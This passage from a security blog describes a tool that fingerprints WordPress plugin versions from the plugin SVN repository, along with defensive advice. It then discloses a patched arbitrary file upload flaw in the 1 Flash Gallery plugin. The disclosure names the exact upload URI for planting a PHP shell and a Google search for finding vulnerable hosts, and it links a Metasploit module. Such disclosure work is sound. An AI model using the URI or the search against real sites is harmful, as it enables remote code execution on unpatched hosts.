So what does the repo give us that we were missing before? Well, we of course have a list of all the plugins, and it is then trivial to grab all of their download stats from wordpress.org to sort them by popularity. In addition, we have not only the current version of each plugin in trunk, but also (if SVN is being used properly) tags for each of the major version changes. Simply by comparing these and finding changed files that we can check for remotely (added/removed/modified content files or added/removed PHP scripts), we can build a very effective fingerprint for each version of the plugin. Then, once we find that a plugin is installed, all we have to do is run a small number of checks to obtain, at the very least, its major version.

My current implementation is not pretty, but it seems to work quite well on the servers I tested against. My signatures are simply binary search trees encoded as Python tuples (don't judge me, it was quick to do it that way), which I regenerate whenever I update the SVN. The initial fingerprinting takes quite a while, as it stupidly MD5s all of the relevant files in the repos. This was before I knew that filecmp/dircmp existed, so that's probably going to be rewritten soon enough.

Once the signatures are created, the scans are quite fast, and very effective. It normally takes only one or two requests to detect a plugin's presence, and in most cases only two or three more to detect the version. It also tries to deal with things like error pages that return 200 by using difflib to compare the error page to the returned page, although there are probably still some issues with that.

As I mentioned earlier, you can check the latest versions over on Google Code from now on. Here's a screenshot of a scan against one of my test servers:

wpfinger in action

Plugins + versions

Now that I've outlined more than enough ways to aid exploitation, let's talk briefly about what can be done to help prevent some of these attacks.

Defend

For the WordPress developers, the best defense would probably be to scan any commits for known vulnerabilities, and either warn or (preferably) block the developers from adding exploitable code to the repository. This can be done quite easily using pre-commit hooks for SVN, which allow for custom verification of commits to a repository. I'm planning on releasing an example script when I get time that will detect commits introducing the vulnerabilities I scanned for, but the more interesting problem is how to gather a larger, better collection of signatures. I've got a couple vague ideas for how to go about doing this, but would love suggestions on the subject.

As for what site admins can do, it's pretty clear: don't install plugins or themes unless you *absolutely* need to, or unless you are willing to audit what you're installing and have the expertise to do so. Just because you have the latest version does not necessarily mean you're safe, and if you forget to update, it's quite easy for an attacker to detect and exploit. In addition to limiting the number of installed plugins, it might be possible to parse the signatures I provide and use a WAF to return tainted results when those URLs are requested too close together. I haven't personally done it, but I'm sure it wouldn't be too extraordinarily difficult.

Conclusion

The methods presented here are not unique to WordPress; I'm fairly confident they could easily be applied to any open source CMS. I largely chose WordPress because I was already working with it when I stumbled into this, and it had a really nice repository to pull from. Please feel free to try it out elsewhere, and let me know how it goes.

P.S.: I'd like to thank duststorm for lending me a server to seed the repos with. Much appreciated.

6 Sep 2011

1 Flash Gallery: Arbitrary File Upload

This is a short post documenting the vulnerability I inadvertently found yesterday in the 1 Flash Gallery plugin. This plugin has been downloaded an estimated 460,000 times, and as of yesterday was ranked by WordPress as the 17th most popular plugin (although I'm not entirely sure how this judgment is made). A patch has since been released, so anyone who has this plugin installed should update immediately. I'll probably do a follow-up in the near future on WordPress plugins in general, but for now, just the facts.

Vulnerability

The 1 Flash Gallery WordPress plugin contains an arbitrary file upload vulnerability, present from version 1.30 through version 1.5.7.

It is possible to plant a remote shell and thereby execute arbitrary code on the remote host by simply submitting a PHP file via POST request to the following URI on a vulnerable installation:

/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify&fileext=php

This works because the upload.php script a.) performs no authentication checks, b.) trusts a user-supplied request variable to provide the allowed filetypes, and c.) does not actually validate that the uploaded file is a well-formed image. I have only tested the vulnerability on an installation that does not perform watermarking (the default setting); it may or may not work on installations that do.

I have created a proof-of-concept Metasploit module demonstrating the vulnerability, which interested persons can download here: http://spareclockcycles.org/downloads/code/fgallery_file_upload.rb

Hosts can be found with the following Google search: inurl:"wp-content/plugins/1-flash-gallery"

Disclosure

I reported the vulnerability to both WordPress and the plugin developers yesterday, Sep 5 2011. Both responded quickly to the issue and took appropriate measures. WordPress temporarily took down the plugin until the patch was released, which the developers did later in the day. I'd like to thank WordPress for their fast and professional response.

I am now releasing details of the vulnerability publicly to ensure that users are aware of the issue, and encourage them to update their plugins accordingly. The 1 Flash Gallery developers did not stress the severe implications of this vulnerability in their changelog (or mention that it was a security issue at all), so this post is partly to ensure that the implications are made clear. Personally, I would uninstall the plugin, given its history of serious security issues and the developers' lack of candor about those reported to them.

As always, any comments are welcome.